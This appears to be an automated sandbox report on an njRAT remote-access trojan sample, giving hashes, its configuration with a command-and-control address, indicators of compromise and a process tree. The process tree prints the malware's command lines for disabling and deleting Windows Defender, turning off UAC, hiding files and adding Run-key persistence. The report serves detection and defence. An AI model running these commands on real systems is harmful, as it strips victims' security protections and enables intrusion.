Analysis
max time kernel: 150s
max time network: 155s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 19-07-2024 22:23
Behavioral task behavioral1
Sample: Aeonixx.exe
Resource: win7-20240704-en
Behavioral task behavioral2
Sample: Aeonixx.exe
Resource: win10v2004-20240709-en
General
Target: Aeonixx.exe
Size: 907KB
MD5: 554025c57d014fd5ed8ab159c96da159
SHA1: 2295d41aae469f8252c872eab15f7b5fcd85593c
SHA256: 7634e00a8aa848b561d2d18d78b1bd9fb2f02380418fb8b6b8b36ee4a201106f
SHA512: 125dce70da69479503f6cd42a16518bfd25b993b58499059703ffd8761dfeea71421d5a212ccddd84663e2ec464eb60128c07154d3a4db07fabe31906225a11c
SSDEEP: 12288:C4j4mGk/gKAsEu0Q07J4TpiQlO0Qcuvmxn0HOBJ7V:C2icgKAo0h0piQlO0QkxnRBJ5
Malware Config
Extracted family: njrat
version: <- NjRAT 0.7d Horror Edition ->
botnet: CS2
C2: 85.108.113.75:1604
mutex: 775de7e7e00d15df96207ab529453f70
reg_key: 775de7e7e00d15df96207ab529453f70
splitter: Y262SUCZ4UJJ
Signatures
UAC bypass 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
Drops startup file 2 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\775de7e7e00d15df96207ab529453f70.exe | dllhost.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\775de7e7e00d15df96207ab529453f70.exe | dllhost.exe
Executes dropped EXE 4 IoCs
pid | Process
344 | AEONIX.EXE
2616 | PAYLOAD.EXE
2916 | S.EXE
1688 | dllhost.exe
Loads dropped DLL 6 IoCs
pid | Process
1188 | Aeonixx.exe
1188 | Aeonixx.exe
344 | AEONIX.EXE
344 | AEONIX.EXE
2520 | Process not Found
2616 | PAYLOAD.EXE
Adds Run key to start application 2 TTPs 2 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\775de7e7e00d15df96207ab529453f70 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\dllhost.exe\" .." | dllhost.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\775de7e7e00d15df96207ab529453f70 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\dllhost.exe\" .." | dllhost.exe
Launches sc.exe 3 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
2308 | sc.exe
2188 | sc.exe
2548 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Modifies registry key 1 TTPs 1 IoCs
pid | Process
2576 | reg.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
2916 | S.EXE
2616 | PAYLOAD.EXE (the remaining 63 of the 64 entries, all PID 2616)
Suspicious use of AdjustPrivilegeToken 35 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2616 | PAYLOAD.EXE
Token: SeDebugPrivilege | 1688 | dllhost.exe
Token: SeDebugPrivilege | 1500 | powershell.exe
Token: 33 | 1688 | dllhost.exe (16 entries, alternating with the next row)
Token: SeIncBasePriorityPrivilege | 1688 | dllhost.exe (16 entries)
Suspicious use of WriteProcessMemory 63 IoCs
description | pid | Process | procid_target | count
PID 1188 wrote to memory of 344 | 1188 | Aeonixx.exe | 30 | 4
PID 344 wrote to memory of 2616 | 344 | AEONIX.EXE | 31 | 4
PID 344 wrote to memory of 2916 | 344 | AEONIX.EXE | 32 | 4
PID 2916 wrote to memory of 2624 | 2916 | S.EXE | 34 | 3
PID 2616 wrote to memory of 1688 | 2616 | PAYLOAD.EXE | 35 | 4
PID 1688 wrote to memory of 2472 | 1688 | dllhost.exe | 36 | 4
PID 1688 wrote to memory of 1492 | 1688 | dllhost.exe | 38 | 4
PID 1492 wrote to memory of 1500 | 1492 | cmd.exe | 40 | 4
PID 1688 wrote to memory of 2948 | 1688 | dllhost.exe | 41 | 4
PID 2948 wrote to memory of 2308 | 2948 | cmd.exe | 43 | 4
PID 1688 wrote to memory of 1056 | 1688 | dllhost.exe | 44 | 4
PID 1056 wrote to memory of 2188 | 1056 | cmd.exe | 46 | 4
PID 1688 wrote to memory of 2784 | 1688 | dllhost.exe | 47 | 4
PID 2784 wrote to memory of 2548 | 2784 | cmd.exe | 49 | 4
PID 1688 wrote to memory of 1356 | 1688 | dllhost.exe | 50 | 4
PID 1356 wrote to memory of 2576 | 1356 | cmd.exe | 52 | 4
Views/modifies file attributes 1 TTPs 1 IoCs
pid | Process
2472 | attrib.exe
Processes
[1] C:\Users\Admin\AppData\Local\Temp\Aeonixx.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Aeonixx.exe"
    PID: 1188
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\AEONIX.EXE
      Command line: "C:\Users\Admin\AppData\Local\Temp\AEONIX.EXE"
      PID: 344
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\PAYLOAD.EXE
        Command line: "C:\Users\Admin\AppData\Local\Temp\PAYLOAD.EXE"
        PID: 2616
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] C:\Users\Admin\AppData\Local\Temp\dllhost.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\dllhost.exe"
          PID: 1688
          - Drops startup file
          - Executes dropped EXE
          - Adds Run key to start application
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\attrib.exe
            Command line: attrib +h "C:\Users\Admin\AppData\Local\Temp\dllhost.exe"
            PID: 2472
            - Views/modifies file attributes
        [5] C:\Windows\SysWOW64\cmd.exe
            Command line: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
            PID: 1492
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Command line: powershell Set-MpPreference -DisableRealtimeMonitoring $true
              PID: 1500
              - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\SysWOW64\cmd.exe
            Command line: cmd /c sc query windefend
            PID: 2948
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\SysWOW64\sc.exe
              Command line: sc query windefend
              PID: 2308
              - Launches sc.exe
        [5] C:\Windows\SysWOW64\cmd.exe
            Command line: cmd /c sc stop windefend
            PID: 1056
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\SysWOW64\sc.exe
              Command line: sc stop windefend
              PID: 2188
              - Launches sc.exe
        [5] C:\Windows\SysWOW64\cmd.exe
            Command line: cmd /c sc delete windefend
            PID: 2784
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\SysWOW64\sc.exe
              Command line: sc delete windefend
              PID: 2548
              - Launches sc.exe
        [5] C:\Windows\SysWOW64\cmd.exe
            Command line: cmd /c reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            PID: 1356
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\SysWOW64\reg.exe
              Command line: reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
              PID: 2576
              - UAC bypass
              - Modifies registry key
    [3] C:\Users\Admin\AppData\Local\Temp\S.EXE
        Command line: "C:\Users\Admin\AppData\Local\Temp\S.EXE"
        PID: 2916
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c pause
          PID: 2624
Network
MITRE ATT&CK Enterprise v15
Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (1)
    Windows Service (1)
Privilege Escalation
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (1)
    Windows Service (1)
Downloads
Filesize: 849KB
MD5: 0b7321cbbce655bb14c3737973936d8a
SHA1: 3fbedbf411835e0d54593ae2fe938679f2f5a858
SHA256: b13a4f5dc328fb50971d5579f8d32ca7af2b9cf5118999e033ff227242a04edd
SHA512: 82ee9dafd3948702da5eef1237270828257177f237115921b96d9d604901e0ce291d82562e20c3e0ad5473bd88615559fca2253a603c229f480b4fec746f4b34

Filesize: 54KB
MD5: dcc788ade743525d6922369a9b1cc1d9
SHA1: 4c100d13f4115f64bbdcc47ffb4f60d50ea9edde
SHA256: 1a82a1b8db2e35e967a2f463292337e08717251b3e836bf1ffa20815b25037c9
SHA512: 67faa32ffb6a426f2626384629ac75083da881f549efe7b42c4d3ad915d93e1f2b07a10d952d9b7079b21964f66a8e5c8adb9a9e5fe59040b4dc5a5447c4fb79

Filesize: 742KB
MD5: 3dbda3d47ec35af319228ebe3677e743
SHA1: 0c3033b7568875bb6041c8eaf7eefb065f2f138e
SHA256: 3d860b0b79377ea570b774977ac1d0976a5ce20c3a71ff67a9b91be84384fd9e
SHA512: 348f308e96400a4abf2f820ecfaff4c9bb3690b6a60cd1f0376913d0cf01af836a78c5df4af0d2fe95d0fa9186cbf6eefc1b2ef75c021b48572457ff273d9f74